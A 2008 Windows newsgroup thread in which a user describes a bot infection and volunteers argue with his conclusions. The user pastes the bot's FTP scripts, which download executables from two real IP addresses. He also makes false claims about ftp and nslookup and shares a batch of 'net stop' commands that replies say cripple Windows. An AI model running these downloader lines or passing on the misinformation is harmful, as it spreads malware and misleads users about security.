*** VIRUS WARNING!!! ***

[Guest Terry Mester]

I have discovered how Spammers are able to access people's Computers to spew

out their Spyware garbage, and it is Microsoft's OS which has made this

possible! Spammers utilize two commands: the "nslookup" Command and the

"ftp" Command found in c:\winnt\system32 -- which you can review in the

Windows Help Menu. Spammers can also use a HTML E-Mail you open on your

Computer while logged onto the Internet to download a Virus. Those E-Mails

you get from friends telling you to forward it on to others, in order to get

good luck or money, are nothing but a SCAM perpetrated by the Spammers!

DELETE those E-Mails -- DO NOT open them!!! Last month after separately

opening two of those E-Mails, I ended up with a Virus on my Computer spewing

out data over the Internet, and also the following two Text Files given the

name "i" under the 'winnt' Directory.

--- \winnt\i

open 136.145.69.79 2755

user 1 1

get kp.exe

quit

--- \winnt\i

open 208.111.5.228 2755

user 1 1

get 2k3.exe

quit

---

The Virus Commands I subsequently found under the 'winnt' or 'system32'

Directories corresponded to the two ".exe" Files named in those two Text

Files. I didn't know where those 4 Command Lines in those "i" Files were

executable until just today when I looked up the "ftp" Command in Help.

Those are 4 sub-commands which caused my Computer to open up the said IP

Address and Port#, log in as the user 1 1, download the Virus Command, and

then quit "ftp". Since I'm a Dial-up user, I immediately noticed something

wrong because this immediately clogged up my Internet Connection. A High

Speed user might not notice anything!

 

It is unbelievable, but the "ftp" Command enables the Spammer to log onto

your Computer WITHOUT using an ID and Password! Further, "ftp" enables the

Spammer to prevent you from seeing what it is doing on your Computer!!! I'm

not kidding! Further still, the "nslookup" Command enables the Spammer to

find out your IP Numbers and Computer ID so that he can use the "ftp"

Command! It is as if Microsoft specifically designed these two Commands to

help Spammers! As far as I can tell, you cannot disable either of these

Commands. You can rename "ftp.exe" to "ftp.exe.rename" and "nslookup.exe" to

"nslookup.exe.rename" in order to make them non-executable, but I don't think

this will solve the problem. Would a Microsoft Corporation technician please

inform us if these two Command functions can be disabled? If not, Microsoft

needs to IMMEDIATELY provide a Service Pack or update to enable these two

functions to be disabled using the "net stop / start" Command. With these

functions disabled, a Firewall Application becomes completely unnecessary!

[Guest The Kat]

Re: *** VIRUS WARNING!!! ***

 

On Sun, 30 Mar 2008 20:59:00 -0700, Terry Mester

<TerryMester@discussions.microsoft.com> wrote:

>I have discovered how Spammers are able to access people's Computers to spew

>out their Spyware garbage, and it is Microsoft's OS which has made this

>possible! Spammers utilize two commands: the "nslookup" Command and the

>"ftp" Command found in c:\winnt\system32

 

YOU are a moron, and shouldn't be allowed to use a computer.

 

 

 

 

--

 

Lumber Cartel (tinlc) #2063. Spam this account at your own risk.

 

This sig censored by the Office of Home, Land & Planet Insecurity...

 

Remove XYZ to email me

[Guest Terry Mester]

Re: *** VIRUS WARNING!!! ***

 

YOU are probably one of those detestable Spammers, and you're worried that

I've discovered your technique!

 

"The Kat" wrote:

> YOU are a moron, and shouldn't be allowed to use a computer.

[Guest Pegasus \(MVP\)]

Re: *** VIRUS WARNING!!! ***

 

 

"Terry Mester" <TerryMester@discussions.microsoft.com> wrote in message

news:43465527-82B7-4AA1-A05F-81086E0A8BCA@microsoft.com...

>I have discovered how Spammers are able to access people's Computers to

>spew

> out their Spyware garbage, and it is Microsoft's OS which has made this

> possible! Spammers utilize two commands: the "nslookup" Command and the

> "ftp" Command found in c:\winnt\system32 -- which you can review in the

> Windows Help Menu. Spammers can also use a HTML E-Mail you open on your

> Computer while logged onto the Internet to download a Virus. Those

> E-Mails

> you get from friends telling you to forward it on to others, in order to

> get

> good luck or money, are nothing but a SCAM perpetrated by the Spammers!

> DELETE those E-Mails -- DO NOT open them!!!

 

The problem is not ftp.exe or nslookup.exe - it's the stuff you

received from "friends", promising you "luck" or "money". You

need to become a little more computer-savvy: Don't open

attachments sent by strangers, and be very careful when opening

attachments sent by friends. Chances are that they haven't got

the faintest idea about the stuff they're sending about: Fun programs,

screen savers, elaborate "jokes" - all of them can spell trouble.

 

Renaming ftp.exe or nslookup.exe is pointless. Change your habits

and install/maintain a good virus scanner.

[Guest David H. Lipman]

Re: *** VIRUS WARNING!!! ***

 

From: "Terry Mester" <TerryMester@discussions.microsoft.com>

 

| I have discovered how Spammers are able to access people's Computers to spew

| out their Spyware garbage, and it is Microsoft's OS which has made this

| possible! Spammers utilize two commands: the "nslookup" Command and the

| "ftp" Command found in c:\winnt\system32 -- which you can review in the

| Windows Help Menu. Spammers can also use a HTML E-Mail you open on your

| Computer while logged onto the Internet to download a Virus. Those E-Mails

| you get from friends telling you to forward it on to others, in order to get

| good luck or money, are nothing but a SCAM perpetrated by the Spammers!

| DELETE those E-Mails -- DO NOT open them!!! Last month after separately

| opening two of those E-Mails, I ended up with a Virus on my Computer spewing

| out data over the Internet, and also the following two Text Files given the

| name "i" under the 'winnt' Directory.

| --- \winnt\i

| open 136.145.69.79 2755

| user 1 1

| get kp.exe

| quit

| --- \winnt\i

| open 208.111.5.228 2755

| user 1 1

| get 2k3.exe

| quit

| ---

| The Virus Commands I subsequently found under the 'winnt' or 'system32'

| Directories corresponded to the two ".exe" Files named in those two Text

| Files. I didn't know where those 4 Command Lines in those "i" Files were

| executable until just today when I looked up the "ftp" Command in Help.

| Those are 4 sub-commands which caused my Computer to open up the said IP

| Address and Port#, log in as the user 1 1, download the Virus Command, and

| then quit "ftp". Since I'm a Dial-up user, I immediately noticed something

| wrong because this immediately clogged up my Internet Connection. A High

| Speed user might not notice anything!

|

| It is unbelievable, but the "ftp" Command enables the Spammer to log onto

| your Computer WITHOUT using an ID and Password! Further, "ftp" enables the

| Spammer to prevent you from seeing what it is doing on your Computer!!! I'm

| not kidding! Further still, the "nslookup" Command enables the Spammer to

| find out your IP Numbers and Computer ID so that he can use the "ftp"

| Command! It is as if Microsoft specifically designed these two Commands to

| help Spammers! As far as I can tell, you cannot disable either of these

| Commands. You can rename "ftp.exe" to "ftp.exe.rename" and "nslookup.exe" to

| "nslookup.exe.rename" in order to make them non-executable, but I don't think

| this will solve the problem. Would a Microsoft Corporation technician please

| inform us if these two Command functions can be disabled? If not, Microsoft

| needs to IMMEDIATELY provide a Service Pack or update to enable these two

| functions to be disabled using the "net stop / start" Command. With these

| functions disabled, a Firewall Application becomes completely unnecessary!

 

This is NOT new an is well known in the anti malware community.

 

What you have decscribed is a BOT action. If it is on the PC, the PC is already infected.

 

The infector creates a script and uses the FTP command to download its peer software. A

batch file then uses the script to automate the FTP process.

 

If file protection is properly working, you can not rename FTP.EXE as it will just reinstate

itself.

 

NSLOOKUP has nothing to do with it.

 

What this shows is that you did not have anti virus installed and/or prioperly updated.

 

BTW: Microsoft is fully aware of the situation and I guarantee you that there will be no

patch because you have to be infected first before the FTP.EXE command will be used

maliciously. You shoud also know there are Trojans that hijack the BITS Service to download

peers.

 

--

Dave

http://www.claymania.com/removal-trojan-adware.html

Multi-AV - http://www.pctipp.ch/downloads/dl/35905.asp

[Guest Terry Mester]

Re: *** VIRUS WARNING!!! ***

 

Pegasus (MVP) 3/31/2008 2:47 AM PST

"You need to become a little more computer-savvy: Don't open attachments

sent by strangers, and be very careful when opening attachments sent by

friends. ... Renaming ftp.exe or nslookup.exe is pointless. Change your

habits and install/maintain a good virus scanner. "

 

I was not referring to opening "executable" E-Mail Attachments (.exe, .com,

..bat, .cmd). I'm talking about the abilities of an HTML (as opposed to Plain

Text) E-Mail. Within about 3 Seconds of "viewing" an HTML E-Mail, it has the

ability to create a Text File on the Hard Drive -- as with the two Files

above. You don't need to open any type of Attachment. It is unsafe to even

LOOK at these Junk E-Mails! I now know better, and I'm simply warning

others. As for a Virus Scanner / Firewall, I have a Pentium III Computer,

and it slows my Computer down too much and so I had to disable it. This

problem is the exclusive fault of Microsoft who has produced defective

security protocols in its Operating Systems -- unlike Apple and Linux!

 

________________________________________

David H. Lipman 3/31/2008 5:52 PM PST

" The infector creates a script and uses the FTP command to download its

peer software. "

 

I know this. The point of this Thread is to warn people that an HTML E-Mail

(Body) can create this Script Text File -- you don't have to open any

Attachment, and I didn't open any!

 

________________________________________

David H. Lipman 3/31/2008 5:52 PM PST

" If file protection is properly working, you can not rename FTP.EXE as it

will just reinstate itself. "

 

You are 100% correct. I only realized this after posting this Thread.

 

________________________________________

David H. Lipman 3/31/2008 5:52 PM PST

" NSLOOKUP has nothing to do with it."

 

In my personal case, nslookup probably wasn't used. However, nslookup would

definitely enable you to spam a specific person's Computer as long as you

know their Internet Server. If you're out to breach a specific Computer,

nslookup is what you need to do it.

 

________________________________________

David H. Lipman 3/31/2008 5:52 PM PST

"What this shows is that you did not have anti virus installed and/or

prioperly updated.

BTW: Microsoft is fully aware of the situation and I guarantee you that

there will be no patch because you have to be infected first before the

FTP.EXE command will be used maliciously."

 

As I mentioned above, I cannot install a Firewall because I only have a

Pentium III with 128M of RAM. I haven't been infected since February 21st

when I last viewed such an E-Mail. I have since been undertaking the

following measures in a Batch Command to protect my Computer before logging

onto the Internet:

net stop "remote access auto connection manager"

net stop "remote access connection manager"

net stop "routing and remote access"

net stop "remote registry service"

net stop "RPClocator"

net stop "RPCss"

net stop "messenger"

net stop "net logon"

I'm not certain how much protection this provides me. I also now generally

use the Internet only while logged into my Computer as a regular "user" and

not an "administrator".

 

________________________________________

David H. Lipman 3/31/2008 5:52 PM PST

"You shoud also know there are Trojans that hijack the BITS Service to

download peers."

 

I'm not familiar with this "BITS Service" you refer to. Can you elaborate

further?

[Guest What's in a Name?]

Re: *** VIRUS WARNING!!! ***

 

Re: *** VIRUS WARNING!!! ***

 

Terry Mester after much thought,came up with this jewel:

> Pegasus (MVP) 3/31/2008 2:47 AM PST

> "You need to become a little more computer-savvy: Don't open

> attachments sent by strangers, and be very careful when opening

> attachments sent by friends. ... Renaming ftp.exe or nslookup.exe is

> pointless. Change your habits and install/maintain a good virus

> scanner. "

>

> I was not referring to opening "executable" E-Mail Attachments (.exe,

> .com, .bat, .cmd). I'm talking about the abilities of an HTML (as

> opposed to Plain Text) E-Mail. Within about 3 Seconds of "viewing"

> an HTML E-Mail, it has the ability to create a Text File on the Hard

> Drive -- as with the two Files above. You don't need to open any

> type of Attachment. It is unsafe to even LOOK at these Junk E-Mails!

> I now know better, and I'm simply warning others. As for a Virus

> Scanner / Firewall, I have a Pentium III Computer, and it slows my

> Computer down too much and so I had to disable it. This problem is

> the exclusive fault of Microsoft who has produced defective security

> protocols in its Operating Systems -- unlike Apple and Linux!

 

 

You have no idea what your talking about.

There are security defects in all OSes.

>

> ________________________________________

> David H. Lipman 3/31/2008 5:52 PM PST

> " The infector creates a script and uses the FTP command to download

> its peer software. "

>

> I know this. The point of this Thread is to warn people that an HTML

> E-Mail (Body) can create this Script Text File -- you don't have to

> open any Attachment, and I didn't open any!

 

set your e-mail client to "text only"

>

> ________________________________________

> David H. Lipman 3/31/2008 5:52 PM PST

> " If file protection is properly working, you can not rename FTP.EXE

> as it will just reinstate itself. "

>

> You are 100% correct. I only realized this after posting this Thread.

>

> ________________________________________

> David H. Lipman 3/31/2008 5:52 PM PST

> " NSLOOKUP has nothing to do with it."

>

> In my personal case, nslookup probably wasn't used. However,

> nslookup would definitely enable you to spam a specific person's

> Computer as long as you know their Internet Server. If you're out to

> breach a specific Computer, nslookup is what you need to do it.

>

> ________________________________________

> David H. Lipman 3/31/2008 5:52 PM PST

> "What this shows is that you did not have anti virus installed and/or

> prioperly updated.

> BTW: Microsoft is fully aware of the situation and I guarantee you

> that there will be no patch because you have to be infected first

> before the FTP.EXE command will be used maliciously."

>

> As I mentioned above, I cannot install a Firewall because I only have

> a Pentium III with 128M of RAM.

 

Buy more RAM(the cost has dropped) and a NAT router(under $50 US) with

a built-in firewall.

 

AntiVir uses very little RAM. So does ThreatFire. GhostWall firewall is

very small also.

> I haven't been infected since

> February 21st when I last viewed such an E-Mail.

 

You need a more secure e-mail client-try Thunderbird.

> I have since been

> undertaking the following measures in a Batch Command to protect my

> Computer before logging onto the Internet:

> net stop "remote access auto connection manager"

> net stop "remote access connection manager"

> net stop "routing and remote access"

> net stop "remote registry service"

> net stop "RPClocator"

> net stop "RPCss"

> net stop "messenger"

> net stop "net logon"

> I'm not certain how much protection this provides me. I also now

> generally use the Internet only while logged into my Computer as a

> regular "user" and not an "administrator".

>

 

You should open services and disable from there.

> ________________________________________

> David H. Lipman 3/31/2008 5:52 PM PST

> "You shoud also know there are Trojans that hijack the BITS Service

> to download peers."

>

> I'm not familiar with this "BITS Service" you refer to. Can you

> elaborate further?

 

Google is your friend

 

max

--

Virus Removal http://max.shplink.com/removal.html

Keep Clean http://max.shplink.com/keepingclean.html

Tools http://max.shplink.com/tools.html

Change nomail.afraid.org to gmail.com to reply by email.

I was lost,but now I'm blind.

[Guest Terry Mester]

Re: *** VIRUS WARNING!!! ***

 

Re: *** VIRUS WARNING!!! ***

 

What's in a Name? 3/31/2008 8:46 PM PST

"Terry Mester after much thought,came up with this jewel:"

 

ANS: Going by this comment and the quotes you provided in your Post, I

think you are confusing the Original Poster's comments with my answers. I

had put the OPs comments in "quotes".

 

________________________________________

What's in a Name? 3/31/2008 8:46 PM PST

" There are security defects in all OSes. "

 

ANS: I'm sure that Apple and Linux have some security problems, but I'm

also sure you would agree that Microsoft has a very high number of problems.

Don't you think it should be possible to turn 'ftp' off!

 

________________________________________

What's in a Name? 3/31/2008 8:46 PM PST

" Buy more RAM(the cost has dropped) and a NAT router(under $50 US)"

 

ANS: My main problem is that my Processor is only 935 MHz. I can buy more

Memory, however, it has to be the same company brand! When I tried

installing a different brand of SIMM Memory Chip on my former Computer, the

Processor wouldn't recognize it! Can you explain that?

 

________________________________________

What's in a Name? 3/31/2008 8:46 PM PST

" You need a more secure e-mail client-try Thunderbird."

 

ANS: I have been using Thunderbird for 2 years. However, I don't think you

can expect TBird to scan the contents of an HTML Message. Those two "i" Text

Files put onto my Hard Drive were pretty benign. I now know better than to

view such a Message, and I always review my E-Mail "offline" so that nothing

can get downloaded from a Message. I believe the last time this happened to

me was from a Message on Hotmail -- which of course has to be opened

"online". I now know better than to open them. It is vitally important for

Internet users to know that you can get infected by just 'looking' at a spam

E-Mail without an Attachment, and to know that these Messages telling you to

forward it on are a new spammer technique. I might still have the original

Message on my Hotmail Account. If you're interested in scrutinizing it, I

could forward it to you.

[Guest David H. Lipman]

Re: *** VIRUS WARNING!!! ***

 

From: "Terry Mester" <TerryMester@discussions.microsoft.com>

 

| Pegasus (MVP) 3/31/2008 2:47 AM PST

| "You need to become a little more computer-savvy: Don't open attachments

| sent by strangers, and be very careful when opening attachments sent by

| friends. ... Renaming ftp.exe or nslookup.exe is pointless. Change your

| habits and install/maintain a good virus scanner. "

|

| I was not referring to opening "executable" E-Mail Attachments (.exe, .com,

| .bat, .cmd). I'm talking about the abilities of an HTML (as opposed to Plain

| Text) E-Mail. Within about 3 Seconds of "viewing" an HTML E-Mail, it has the

| ability to create a Text File on the Hard Drive -- as with the two Files

| above. You don't need to open any type of Attachment. It is unsafe to even

| LOOK at these Junk E-Mails! I now know better, and I'm simply warning

| others. As for a Virus Scanner / Firewall, I have a Pentium III Computer,

| and it slows my Computer down too much and so I had to disable it. This

| problem is the exclusive fault of Microsoft who has produced defective

| security protocols in its Operating Systems -- unlike Apple and Linux!

 

 

Add RAM. RAM is cheap Today!

Use anti virus, [practice Safe Hex or you will be infected again !

 

| ________________________________________

| David H. Lipman 3/31/2008 5:52 PM PST

| " The infector creates a script and uses the FTP command to download its

| peer software. "

|

| I know this. The point of this Thread is to warn people that an HTML E-Mail

| (Body) can create this Script Text File -- you don't have to open any

| Attachment, and I didn't open any!

|

 

 

The HTML did NOT create the BOT script.

You may have clicked on a link in the HTML that caused the malware to be installed.

 

 

| ________________________________________

| David H. Lipman 3/31/2008 5:52 PM PST

| " If file protection is properly working, you can not rename FTP.EXE as it

| will just reinstate itself. "

|

| You are 100% correct. I only realized this after posting this Thread.

 

 

I know I was.

 

 

|

| ________________________________________

| David H. Lipman 3/31/2008 5:52 PM PST

| " NSLOOKUP has nothing to do with it."

|

| In my personal case, nslookup probably wasn't used. However, nslookup would

| definitely enable you to spam a specific person's Computer as long as you

| know their Internet Server. If you're out to breach a specific Computer,

| nslookup is what you need to do it.

|

 

 

NSLOOKUP would NOT help "spam". It is purely a names resolution lookup utility and that's

all.

 

 

| ________________________________________

| David H. Lipman 3/31/2008 5:52 PM PST

| "What this shows is that you did not have anti virus installed and/or

| prioperly updated.

| BTW: Microsoft is fully aware of the situation and I guarantee you that

| there will be no patch because you have to be infected first before the

| FTP.EXE command will be used maliciously."

|

| As I mentioned above, I cannot install a Firewall because I only have a

| Pentium III with 128M of RAM. I haven't been infected since February 21st

| when I last viewed such an E-Mail. I have since been undertaking the

| following measures in a Batch Command to protect my Computer before logging

| onto the Internet:

| net stop "remote access auto connection manager"

| net stop "remote access connection manager"

| net stop "routing and remote access"

| net stop "remote registry service"

| net stop "RPClocator"

| net stop "RPCss"

| net stop "messenger"

| net stop "net logon"

| I'm not certain how much protection this provides me. I also now generally

| use the Internet only while logged into my Computer as a regular "user" and

| not an "administrator".

 

 

All you have done is cripple the OS. A completely wrong approach!

 

 

| ________________________________________

| David H. Lipman 3/31/2008 5:52 PM PST

| "You shoud also know there are Trojans that hijack the BITS Service to

| download peers."

|

| I'm not familiar with this "BITS Service" you refer to. Can you elaborate

| further?

 

 

BITS is used by the MS Auto Update process for downloading ctrical and other MS updates.

 

I again repeat...

 

Use anti virus software !

 

Example:

AntiVirir Free -- http://www.freeav.com

 

If you are unwilling to use AV software and putrchase RAM, diconnect the PC from the

Internet.

 

--

Dave

http://www.claymania.com/removal-trojan-adware.html

Multi-AV - http://www.pctipp.ch/downloads/dl/35905.asp

[Guest John John]

Re: *** VIRUS WARNING!!! ***

 

Terry Mester wrote:

> ________________________________________

> David H. Lipman 3/31/2008 5:52 PM PST

> "What this shows is that you did not have anti virus installed and/or

> prioperly updated.

> BTW: Microsoft is fully aware of the situation and I guarantee you that

> there will be no patch because you have to be infected first before the

> FTP.EXE command will be used maliciously."

>

> As I mentioned above, I cannot install a Firewall because I only have a

> Pentium III with 128M of RAM. I haven't been infected since February 21st

> when I last viewed such an E-Mail. I have since been undertaking the

> following measures in a Batch Command to protect my Computer before logging

> onto the Internet:

> net stop "remote access auto connection manager"

> net stop "remote access connection manager"

> net stop "routing and remote access"

> net stop "remote registry service"

> net stop "RPClocator"

> net stop "RPCss"

> net stop "messenger"

> net stop "net logon"

> I'm not certain how much protection this provides me. I also now generally

> use the Internet only while logged into my Computer as a regular "user" and

> not an "administrator".

 

Why you need to use a batch file to kill services is something only you

know, all services can be set to manual start or they can be completely

disabled if they truly are unneeded, there isn't much need to use a

batch file to kill the above services, their start behaviour can easily

be changed in the Services Management Console.

 

Killing RPCss is a good way to effectively cripple the Windows session,

hardly nothing works properly without this service!

 

John

[Guest What's in a Name?]

Re: *** VIRUS WARNING!!! ***

 

Re: *** VIRUS WARNING!!! ***

 

Terry Mester after much thought,came up with this jewel:

> What's in a Name? 3/31/2008 8:46 PM PST

> "Terry Mester after much thought,came up with this jewel:"

>

> ANS: Going by this comment and the quotes you provided in your Post,

> I think you are confusing the Original Poster's comments with my

> answers. I had put the OPs comments in "quotes".

>

> ________________________________________

> What's in a Name? 3/31/2008 8:46 PM PST

> " There are security defects in all OSes. "

>

> ANS: I'm sure that Apple and Linux have some security problems, but

> I'm also sure you would agree that Microsoft has a very high number

> of problems. Don't you think it should be possible to turn 'ftp' off!

 

I'm not sure about turning off FTP. But about Linux security,

Here,do some light reading:

http://www.networkworld.com/newsletters/linux/2006/0501linux1.html?fsrc=

rss-virusworms

>

> ________________________________________

> What's in a Name? 3/31/2008 8:46 PM PST

> " Buy more RAM(the cost has dropped) and a NAT router(under $50 US)"

>

> ANS: My main problem is that my Processor is only 935 MHz. I can

> buy more Memory, however, it has to be the same company brand! When

> I tried installing a different brand of SIMM Memory Chip on my former

> Computer, the Processor wouldn't recognize it! Can you explain that?

>

 

I have 2 systems with 666mz/512mb running XPpro just fine.

Perhaps there are some changes needed in the BIOS?

> ________________________________________

> What's in a Name? 3/31/2008 8:46 PM PST

> " You need a more secure e-mail client-try Thunderbird."

>

> ANS: I have been using Thunderbird for 2 years. However, I don't

> think you can expect TBird to scan the contents of an HTML Message.

> Those two "i" Text Files put onto my Hard Drive were pretty benign.

> I now know better than to view such a Message, and I always review my

> E-Mail "offline" so that nothing can get downloaded from a Message.

> I believe the last time this happened to me was from a Message on

> Hotmail -- which of course has to be opened "online".

 

I never use the web interface. I use Thunderbird to check all my mail

(hotmail,yahoo,pop3). If you need some help setting up Thunderbird, let

me know.

> I now know

> better than to open them. It is vitally important for Internet users

> to know that you can get infected by just 'looking' at a spam E-Mail

> without an Attachment, and to know that these Messages telling you to

> forward it on are a new spammer technique. I might still have the

> original Message on my Hotmail Account. If you're interested in

> scrutinizing it, I could forward it to you.

 

I guess that HTML needs turned off by default in all e-mail clients.

 

max

--

Virus Removal http://max.shplink.com/removal.html

Keep Clean http://max.shplink.com/keepingclean.html

Tools http://max.shplink.com/tools.html

Change nomail.afraid.org to gmail.com to reply by email.

I was lost,but now I'm blind.